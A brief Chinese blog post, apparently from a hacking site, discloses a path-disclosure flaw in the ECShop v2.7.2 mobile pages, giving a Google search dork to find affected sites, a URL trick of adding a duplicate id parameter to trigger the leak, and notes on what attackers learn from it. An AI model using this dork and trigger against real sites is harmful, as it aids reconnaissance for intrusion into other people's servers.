Technology · 2012 年 2 月 12 日 0

ECShop v2.7.2 wap页面暴路径0day

谷歌:inurl:mobile/goods.php?act=view_img&id=123

搜到后在页面加个&id=5
也就是http://www.orzhack.com/mobile/goods.php?act=view_img&id=123&id=5

譬如,对于很多论坛来说,提交一个不存在的文件请求,或者提交一个没有输出的文件的请求,服务器就会将网站本身所有的物理路径给暴露出来。
危害  得到物理路径到底有什么用?这是很多攻击者关心的问题。有些时候它能给攻击者带来一些有用的信息,比如说:可以大致了解系统的文件目录结构;可以看出系统所使用的第三方软件;也说不定会得到一个合法的用户名(因为很多人把自己的用户名作为网站的目录名)。
by:hackshy